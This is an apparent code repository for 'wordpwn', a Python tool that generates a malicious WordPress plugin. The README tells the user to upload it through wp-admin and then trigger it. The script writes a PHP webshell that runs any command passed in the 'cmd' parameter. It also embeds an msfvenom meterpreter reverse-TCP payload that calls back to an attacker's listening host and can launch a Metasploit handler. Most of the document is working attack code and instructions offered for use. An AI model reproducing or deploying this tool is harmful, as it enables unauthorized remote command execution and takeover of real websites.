├── LICENSE.md
├── README.md
└── wordpwn.py


/LICENSE.md:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2017 
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Malicious WordPress plugin
 2 | 
 3 | This utility simply generates a WordPress plugin that will grant you a reverse shell and a webshell once uploaded. I recommend installing Kali Linux, as MSFvenom is used to generate the payload.
 4 | 
 5 | It goes without mentioning that in order for this method to be effective, you must have credentials to a
 6 | valid User account, with rights to add plugins to the WordPress website ;)
 7 | 
 8 | ## Usage Example
 9 | ```sh
10 | root@wetw0rk:~# python wordpwn.py
11 | __        __            _
12 | \ \      / /__  _ __ __| |_ ____      ___ __
13 |  \ \ /\ / / _ \|  __/ _  |  _ \ \ /\ / /  _ \
14 |   \ V  V / (_) | | | (_| | |_) \ V  V /| | | |
15 |    \_/\_/ \___/|_|  \__,_| .__/ \_/\_/ |_| |_|
16 |                          |_|
17 | 
18 | 
19 | Usage: wordpwn.py [LHOST] [LPORT] [HANDLER]
20 | Example: wordpwn.py 192.168.0.6 8888 Y
21 | ```
22 | 
23 | ## How and When do I use this?
24 | 
25 | Usage is super simple, simply pass wordpwn your listening address and listening port and execute the script. You are also given the option to start a handler, I recommend that you do... since by default the plugin will be made using a `php/meterpreter/reverse_tcp` reverse shell.If you have your own nefarious PHP payload simply adjust the script to accept it.
26 | 
27 | After the script is ran, a zip file (the plugin) called `malicious.zip` will be created in the current directory (and a handler will be started if you specified it with the `Y` option).
28 | Upload this zip file as a new plugin (by browsing to the URL `http://(target)/wp-admin/plugin-install.php?tab=upload`).
29 | Once uploaded, you have to activate the plugin.
30 | 
31 | Be sure to start our listener (if you didn't specify the handler with the `Y` option) !
32 | If reverse shell connection doesn't hang there is a webshell uploaded which can be accessed.
33 | 
34 | Once the plugin installed and activated, just navigate to the following URLs to launch the reverse shell or the webshell :
35 |  - http://(target)/wp-content/plugins/malicious/wetw0rk_maybe.php
36 |  - http://(target)/wp-content/plugins/malicious/QwertyRocks.php
37 |  - http://(target)/wp-content/plugins/malicious/SWebTheme.php?cmd=ls  (Webshell with list directory command)
38 | 
39 | 
40 | **Note:** if the script usage is still a mystery to you, [JavaRockstar](https://github.com/JavaRockstar) has made a tutorial on his website [HackingVision](https://hackingvision.com/2017/04/11/hacking-wordpress-website-malicious-plug/) about it.
41 | 
42 | 
43 | ## PLEASE READ
44 | I want to be 100% sure that I give credit to [Rob Carr](https://www.rastating.com/). Rob Carr is the author of the Metasploit module `wp_admin_shell_upload`, which this script is based on. You can find more information on his module at [Rapid7](https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload) .
45 | 
46 | ## DISCLAIMER
47 | We are not responsible for any bad use case, use this script at your own risks, do not use it for any illegal/unethical purposes.
48 | 


--------------------------------------------------------------------------------
/wordpwn.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | #
  3 | # Script name     : wordpwn.py
  4 | # Version         : 2.3
  5 | # Created date    : 3/1/2017
  6 | # Last update     : 10/02/2024
  7 | # Author          : wetw0rk & 3isenHeiM
  8 | # Contributors    : 34ZY
  9 | # Inspired by     : Metasploit admin shell upload
 10 | # Python version  : 3.7
 11 | # Description     : Simply generates a wordpress plugin that will grant you a reverse shell and integrate a webshell
 12 | #                   once uploaded. I recommend installing Kali Linux, as msfvenom is used
 13 | #                   to generate the payload.
 14 | #
 15 | 
 16 | import os, random, sys, zipfile, subprocess, requests
 17 | 
 18 | try:
 19 | 
 20 | 	LHOST = 'LHOST=' + str(sys.argv[1])
 21 | 	LPORT = 'LPORT=' + str(sys.argv[2])
 22 | 	PAYLOAD = 'php/meterpreter/reverse_tcp'
 23 | 	HANDLER = sys.argv[3]
 24 | 
 25 | except IndexError:
 26 | 
 27 | 	print("__        __            _")
 28 | 	print("\ \      / /__  ____ __| |___ __      __ ___")
 29 | 	print(" \ \ /\ / / _ \|  __/ _  |  _ \ \ /\ / /  _ \ ")
 30 | 	print("  \ V  V / (_) | | | (_| | |_) \ V  V /| | | |")
 31 | 	print("   \_/\_/ \___/|_|  \__,	_| .__/ \_/\_/ |_| |_|")
 32 | 	print("                         |_|")
 33 | 	print('\n')
 34 | 	print("Usage: %s [LHOST] [LPORT] [HANDLER]" % sys.argv[0])
 35 | 	print("Example: %s 192.168.0.6 8888 Y" % sys.argv[0])
 36 | 	sys.exit()
 37 | 
 38 | def generate_plugin(LHOST, LPORT, PAYLOAD):
 39 | 
 40 | 	# Check if msfvenom is installed
 41 | 	print("[*] Checking if msfvenom installed")
 42 | 	if "msfvenom" in os.listdir("/usr/bin/"):
 43 | 		print("[+] msfvenom installed")
 44 | 	elif "msfvenom" in os.listdir("/opt/metasploit-framework/bin/"):
 45 | 		print("[+] msfvenom installed (MacOS)")
 46 | 	else:
 47 | 		print("[-] msfvenom not installed")
 48 | 		sys.exit()
 49 | 	# Our "Plugin" Contents
 50 | 	print("[+] Generating plugin script")
 51 | 	plugin_script = "<?php\n"
 52 | 	plugin_script += "/**\n"
 53 | 	plugin_script += " * Plugin Name: %s\n" % ('GotEm')
 54 | 	plugin_script += " * Version: %d.%d.%d\n" % (random.randint(1, 10), random.randint(1, 10), random.randint(1, 10))
 55 | 	plugin_script += " * Author: PwnedSauce\n"
 56 | 	plugin_script += " * Author URI: http://PwnedSauce.com\n"
 57 | 	plugin_script += " * License: GPL2\n"
 58 | 	plugin_script += " */\n"
 59 | 	plugin_script += "?>\n"
 60 | 	# Write Plugin Contents To File
 61 | 	print("[+] Writing plugin script to file")
 62 | 	plugin_file = open('QwertyRocks.php','w')
 63 | 	plugin_file.write(plugin_script)
 64 | 	plugin_file.close()
 65 | 	
 66 | 	# Generate Webshell payload
 67 | 	print("[+] Generating webshell payload")
 68 | 	plugin_script = "<?php\n"
 69 | 	plugin_script += "/**\n"
 70 | 	plugin_script += " * Plugin Name: %s\n" % ('GotYaAll')
 71 | 	plugin_script += " * Version: %d.%d.%d\n" % (random.randint(1, 10), random.randint(1, 10), random.randint(1, 10))
 72 | 	plugin_script += " * Author: 34ZY\n"
 73 | 	plugin_script += " * Author URI: https://github.com/34zY\n"
 74 | 	plugin_script += " * License: GPL2\n"
 75 | 	plugin_script += " */\n"
 76 | 	plugin_script += "system($_GET['cmd']);" # Tiny Webshell content
 77 | 	plugin_script += "?>\n"
 78 | 	print("[+] Writing plugin script to file")
 79 | 	plugin_file = open('SWebTheme.php','w')
 80 | 	plugin_file.write(plugin_script)
 81 | 	plugin_file.close()
 82 | 
 83 | 	# Generate MSF Payload
 84 | 	print("[+] Generating payload To file")
 85 | 	create_payload = subprocess.Popen(
 86 | 		['msfvenom', '-p', PAYLOAD, LHOST, LPORT,
 87 | 		'-e', 'php/base64', '-f', 'raw'], stdout=subprocess.PIPE).communicate()[0]
 88 | 	# Write Our Payload To A File
 89 | 	payload_file = open('wetw0rk_maybe.php', 'wb')
 90 | 	payload_file.write(b"<?php ")
 91 | 	payload_file.write(create_payload)
 92 | 	payload_file.write(b" ?>")
 93 | 	payload_file.close()
 94 | 
 95 | 
 96 | 	# Create Zip With Payload
 97 | 	print("[+] Writing files to zip")
 98 | 	make_zip = zipfile.ZipFile('malicious.zip', 'w')
 99 | 	make_zip.write('SWebTheme.php')
100 | 	make_zip.write('wetw0rk_maybe.php')
101 | 	make_zip.write('QwertyRocks.php')
102 | 	print("[+] Cleaning up files")
103 | 	os.system("rm QwertyRocks.php wetw0rk_maybe.php SWebTheme.php")
104 | 	# Useful Info
105 | 	print("[+] URL to upload the plugin: http://(target)/wp-admin/plugin-install.php?tab=upload")
106 | 	print("[+] How to trigger the reverse shell : ")
107 | 	print("      ->   http://(target)/wp-content/plugins/malicious/wetw0rk_maybe.php")
108 | 	print("      ->   http://(target)/wp-content/plugins/malicious/QwertyRocks.php")
109 | 	print("      ->   http://(target)/wp-content/plugins/malicious/SWebTheme.php?cmd=ls")
110 | 
111 | 
112 | def handler(LHOST, LPORT, PAYLOAD):
113 | 	# Write MSF ressource file
114 | 	print("[+] Launching handler")
115 | 	handler = "use exploit/multi/handler\n"
116 | 	handler += "set PAYLOAD %s\n" % PAYLOAD
117 | 	handler += "set LHOST %s\n" % LHOST.lstrip('LHOST=')
118 | 	handler += "set LPORT %s\n" % LPORT.lstrip('LPORT=')
119 | 	handler += "exploit"
120 | 	handler_file = open('wordpress.rc', 'w')
121 | 	handler_file.write(handler)
122 | 	handler_file.close()
123 | 	# Start MetaSploit and setup listener
124 | 	os.system("msfconsole -r wordpress.rc")
125 | 
126 | 
127 | # Generate Plugin
128 | generate_plugin(LHOST, LPORT, PAYLOAD)
129 | # Handler
130 | if HANDLER == 'Y':
131 | 	handler(LHOST, LPORT, PAYLOAD)
132 | else:
133 | 	sys.exit()
134 | 


--------------------------------------------------------------------------------